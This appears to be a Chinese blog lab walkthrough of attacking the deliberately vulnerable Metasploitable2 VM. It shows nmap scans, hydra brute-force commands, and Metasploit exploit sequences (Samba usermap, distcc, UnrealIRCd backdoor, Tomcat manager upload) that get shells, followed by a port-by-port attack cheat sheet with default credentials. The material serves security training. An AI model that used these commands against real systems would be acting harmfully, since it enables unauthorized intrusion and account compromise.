Metasploitable2靶机渗透

该靶机作用是用来作为MSF攻击用的靶机,是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统

靶机介绍

参考文章:http://metasploit.lofter.com/post/d9d60_6a924d

Metasploitable是一个虚拟机文件,从网上下载解压之后就可以直接使用,无需安装。Metasploitable基于Ubuntu
Linux,由于基于Ubuntu,用起来十分得心应手。Metasploitbale建立的初衷,其实就是为了测试一下本家的MSF漏洞框架集工具,所以,它的内核是2.6.24,而且一般在Liunx会产生问题的服务、工具或者软件它都集齐了(请看下文…)。版本2添加了更多的漏洞,而且更让人兴奋的是,系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

主机发现

1
nmap -sP 192.168.211.1/24

1591752316703

192.168.211.157

端口扫描

1
nmap -A 192.168.211.157 -p 1-65535
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
PORT      STATE SERVICE     VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.211.151
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2020-06-09T13:27:07+00:00; +4s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, ConnectWithDatabase, SupportsCompression
| Status: Autocommit
|_ Salt: EkjSC2pas@$1i@BhiSFB
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2020-06-09T13:26:56+00:00; +4s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 0:04:08
| source ident: nmap
| source host: 77221F35.3B88F125.FFFA6D49.IP
|_ error: Closing Link: ljoynhpjb[192.168.211.151] (Quit: ljoynhpjb)
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
33959/tcp open java-rmi GNU Classpath grmiregistry
42344/tcp open nlockmgr 1-4 (RPC #100021)
49564/tcp open status 1 (RPC #100024)
58666/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:8B:76:3D (VMware)

靶机开放了很多端口,逐个进行尝试

常用端口利用总结

img

img

img

img

21端口

端口说明:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式登录FTP服务器。目前,通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。另外,还有一个20端口是用于FTP数据传输的默认端口号

该处可以使用hydra进行ftp账号密码爆破

1
hydra 192.168.211.157 ftp -L user.txt admin -P password.txt

1591761037664

之后登陆

1
ftp 192.168.211.157 21

1591842916873

22端口

22端口就是ssh端口,PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh
这里可以通过爆破22端口来进行攻击

1
hydra 192.168.211.157 ssh -L user.txt  -P password.txt

1591843615410

之后使用ssh登陆

1
ssh msfadmin@192.168.211.157

1591843699978

23端口

23端口是telnet的端口。Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

依旧是使用hydra进行爆破

1
hydra 192.168.211.157 telnet -L user.txt  -P password.txt

1591846786014

连接

1
telnet 192.168.211.157

1591846965570

25端口

SMTP是一个相对简单的基于文本协议。在其之上指定了一条消息的一个或多个接收者(在大多数情况下被确认是存在的),然后消息文本会被传输。可以很简单地通过telnet程序来测试一个SMTP服务器。SMTP使用TCP端口25
利用方式:

  1. 爆破:弱口令
  2. 未授权访问

参考文章:https://www.sqlsec.com/2017/08/smtp.html

53端口

53端口是DNS域名服务器的通信端口,通常用于域名解析。也是网络中非常关键的服务器之一。这类服务器容易受到攻击。对于此端口的渗透,一般有三种方式。

1
2
3
1)使用DNS远程溢出漏洞直接对其主机进行溢出攻击,成功后可直接获得系统权限。(https://www.seebug.org/vuldb/ssvid-96718)
(2)使用DNS欺骗攻击,可对DNS域名服务器进行欺骗,如果黑客再配合网页木马进行挂马攻击,无疑是一种杀伤力很强的攻击,黑客可不费吹灰之力就控制内网的大部分主机。这也是内网渗透惯用的技法之一。(https://baijiahao.baidu.com/s?id=1577362432987749706&wfr=spider&for=pc)
3)拒绝服务攻击,利用拒绝服务攻击可快速的导致目标服务器运行缓慢,甚至网络瘫痪。如果使用拒绝服务攻击其DNS服务器。将导致用该服务器进行域名解析的用户无法正常上网。(http://www.edu.cn/xxh/fei/zxz/201503/t20150305_1235269.shtml)(4)DNS劫持。(https://blog.csdn.net/qq_32447301/article/details/77542474

80端口

扫描目录,发现phpmyadmin和phpinfo.php
1591864439751

PHP版本为5.2.4
使用PHP-CGI远程任意代码执行漏洞进行攻击

PHP-CGI远程代码执行漏洞(CVE-2012-1823)
影响版本 php < 5.3.12 or php < 5.4.2

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.211.157

rhost => 192.168.211.157

msf exploit(php_cgi_arg_injection) > run

1591864645403

成功获得会话

1591864665322

139/445端口

139端口是为‘NetBIOS SessionService’提供的,主要用于提供windows文件和打印机共享以及UNIX中的Samba服务。

445端口也用于提供windows文件和打印机共享,在内网环境中使用的很广泛。这两个端口同样属于重点攻击对象,139/445端口曾出现过许多严重级别的漏洞。下面剖析渗透此类端口的基本思路。

对于开放139/445端口的主机,一般尝试利用溢出漏洞对远程主机进行溢出攻击,成功后直接获得系统权限。利用msf的ms-017永恒之蓝。(https://blog.csdn.net/qq_41880069/article/details/82908131)
对于攻击只开放445端口的主机,黑客一般使用工具‘MS06040’或‘MS08067’.可使用专用的445端口扫描器进行扫描。NS08067溢出工具对windows2003系统的溢出十分有效,工具基本使用参数在cmd下会有提示。(https://blog.csdn.net/god_7z1/article/details/6773652)
对于开放139/445端口的主机,黑客一般使用IPC$进行渗透。在没有使用特点的账户和密码进行空连接时,权限是最小的。获得系统特定账户和密码成为提升权限的关键了,比如获得administrator账户的口令。(https://blog.warhut.cn/dmbj/145.html)
对于开放139/445端口的主机,可利用共享获取敏感信息,这也是内网渗透中收集信息的基本途径。

该端口开放的服务为Samba smbd 3.X-4.X

search samba

use exploit/multi/samba/usermap_script

set rhosts 192.168.211.157

run

1591865799083

2121端口

改端口仍然是ftp端口,可以使用爆破

1
hydra 192.168.211.157 -s 2121 ftp -L user.txt admin -P password.txt

1591867632649

1
ftp 192.168.211.157 2121

1591867673441

2409端口

NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。

在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。如今NFS具备了防止被利用导出文件夹的功能,但遗留系统中的NFS服务配置不当,则仍可能遭到恶意攻击者的利用。

  1. 未授权访问([https://www.freebuf.com/articles/network/159468.html)(http://www.secist.com/archives/6192.htm)
1
scanner/nfs/nfsmount

3306端口

该端口为MySQL数据库默认端口,常用的攻击手法有

爆破:弱口令
身份认证漏洞:CVE-2012-2122
拒绝服务攻击:利用sql语句是服务器进行死循环打死服务器
Phpmyadmin万能密码绕过:用户名:‘localhost’@‘@” 密码任意

爆破

1
hydra 192.168.211.157 -s 3306 mysql -L user.txt  -P password.txt

3632端口

Distcc用于将大规模的代码放到网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是 XCode 1.5 版本及其他版本的 distcc 2.x 版本配署对于服务器端口的访问不限制造成的。
简单的说就是服务对端口和执行的任务检查不够严格,从而造成攻击者可以利用分布式的编译任务执行自己想要执行的命令。

使用msf攻击

use exploit/unix/misc/distcc_exec

set rhosts 192.168.211.157

1591884406824

5432端口

PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统,可以说是目前世界上最先进,功能最强大的自由数据库管理系统。包括kali系统中msf也使用这个数据库;浅谈postgresql数据库攻击技术 大部分关于它的攻击依旧是sql注入,所以注入才是数据库不变的话题。
(1)爆破:弱口令:postgres postgres
(2)缓冲区溢出:CVE-2014-2669http://drops.xmd5.com/static/drops/tips-6449.html
(3)远程代码执行:CVE-2018-1058。https://www.secpulse.com/archives/69153.html

  1. 爆破:
1
hydra 192.168.211.157 -s 5432 postgres -L user.txt  -P password.txt

1591881378614

或者使用msf

use auxiliary/scanner/postgres/postgres_login

set rhosts 192.168.211.157

1591881465105

远程登录

psql -h 192.168.211.157 –u postgres

1591881659308

5900端口

5900端口是优秀远程控制软件VNC的默认监听端口,此软件由著名的AT&T的欧洲研究实验室开发的。

VNC是在基于unix和linux操作系统的免费的开放源码软件,远程控制能力强大,高效实用,其性能可以和windows和MAC中的任何一款控制软件媲美。对于该端口的渗透,思路如下:

  1. VNC软件存在密码验证绕过漏洞,此高危漏洞可以使得恶意攻击者不需要密码就可以登录到一个远程系统。
  2. cain同样支持对VNC的嗅探,同时支持端口修改。
  3. VNC的配置信息同样被写入注册表系统中,其中包括连接的密码和端口。利用webshell的注册表读取功能进行读取加密算法,然后破解。
  4. VNC拒绝服务攻击(CVE-2015-5239)。(http://blogs.360.cn/post/vnc%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9Ecve-2015-5239%E5%88%86%E6%9E%90.html)
  5. VNC权限提升(CVE-2013-6886)。
1
2
1. vnc未授权访问
auxiliary/scanner/vnc/vnc_none_auth

6667端口

1
2
irc实时聊天服务,可提权
exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor

set rhosts 192.168.211.157

run

1591887506202

8180端口

Apache Tomcat弱口令

1591869167703

使用msf进行攻击

search tomcat

use auxiliary/scanner/http/tomcat_mgr_login

set RHOSTS 192.168.211.157

set RPORT 8180

run

1591869383056

之后再使用exploit/multi/http/tomcat_mgr_upload模块进行getshell

use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.211.157

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8180

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat

msf exploit(multi/http/tomcat_mgr_upload) > exploit

1591870573718

汇总

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
#21端口

1. 爆破(hydra、msf中的ftp爆破模块)

2. ftp匿名访问:用户名:anonymous 密码:为空或者任意邮箱

3. 后门vsftpd :version2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。
unix/ftp/vsftpd_234_backdoor
(https://www.freebuf.com/column/143480.html)



#22端口

1. 爆破(hydra、msf中的ssh爆破模块)

2. openssh 用户枚举 CVE-2018-15473



#23端口

1. 爆破(hydra、msf中的ssh爆破模块)



#80端口

1. MS15-034 http.sys远程代码执行漏洞(windoiws 8.1, 2012, or 2012R2有效。)

2. IIS web dav缓冲区溢出(工具:WebDAVScan)



#161端口

1. snmp默认团体名漏洞
(nmap -sU -p161 --script=snmp-brute.nse IP)



#135&139&445端口

1. MS17-010永恒之蓝
(auxiliary/scanner/smb/smb_ms17_010)



#443端口

1. 心脏出血



#873端口

1. rsync未授权访问



#1099端口

1. java_rmi反序列化远程命令执行
nmap -sV -p 1099 IP --script=rmi-vuln-classloader
注册信息暴露
nmap -sV -p 1099 IP --script=rmi-dumpregistry.nse



#1433端口

1. SQLServer暴力破解



#1521端口

1. 弱口令

2. Oracle tns中间人远程注册投毒漏洞
(auxiliary/scanner/oracle/tnspoison_checker)



#1883端口

1. mqtt未授权访问
使用Nmap探测mqtt服务
使用MQTT.fx检测是否存在未授权



#2049端口

1. nfs网络文件系统敏感信息泄漏漏洞(scanner/nfs/nfsmount)



#2181端口

1. zookeeper未授权访问
执行以下命令即可远程获取该服务器的环境
echo envi | nc ip port
直接连接:
./zkCli.sh -server ip:port



#2375端口

1. docker未授权访问



#3306端口

1. Mysql弱口令



#3389端口

1. 远程桌面弱口令

2. MS12-020
检测auxiliary/scanner/rdp/ms12_020_check
Dos攻击模块auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3. CVE-2019-0708
auxiliary/scanner/rdp/cve_2019_0708_bluekeep



#5900端口

1. vnc未授权访问
auxiliary/scanner/vnc/vnc_none_auth



#6000端口

1. X11弱口令

2. X11未授权访问
auxiliary/scanner/x11/open_x11



#6379端口

1. redis未授权访问(dbscanner)



#6666&6667端口

1. irc实时聊天服务,可提权
exploit/unix/irc/unreal_ircd_3281_backdoor



#7001&7002端口

1. weblogic反序列化

2. 控制台弱口令



#7777端口

1. jdwp-java远程命令



#8080端口

1. Tomcat弱口令

2. 危险的Http请求

3. Tomcat远程代码执行漏洞(https://www.freebuf.com/column/159200.html)
Tomcat任意文件上传。(http://liehu.tass.com.cn/archives/836)
Tomcat远程代码执行&信息泄露。(https://paper.seebug.org/399/)
Jboss远程代码执行。(http://mobile.www.cnblogs.com/Safe3/archive/2010/01/08/1642371.html)
Jboss反序列化漏洞。(https://www.zybuluo.com/websec007/note/838374)
Jboss漏洞利用。(https://blog.csdn.net/u011215939/article/details/79141624)



#8161端口

1. activemq远程代码执行

2. activemq未授权访问(弱口令)



#9000端口

1. fastcgi远程代码执行



#9001端口

1. supervisor远程命令执行


#9090端口

1. websphere爆破/java反序列化/弱口令


#9200端口

1. elasticsearch未授权访问
访问URL即可
http://IP:9200/_nodes
http://IP:9200/_river


#11211端口

1. memcached未授权访问(dbscanner)
telnet <target> 11211
nc -vv <target> 11211


#12345端口

1. 达梦数据库默认口令
账号:SYSDBA
密码SYSDBA


#27017端口

1. mongodb未授权访问
auxiliary/scanner/mongodb/mongodb_login


#50070端口

1. hadoop未授权访问

原文链接:https://blog.csdn.net/Alluresec/article/details/103171729

参考文章

文章作者:CyzCc
最后更新:2020年06月15日 16:06:30
原始链接:https://cyzcc.vip/2020/06/15/Metasploitable2/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------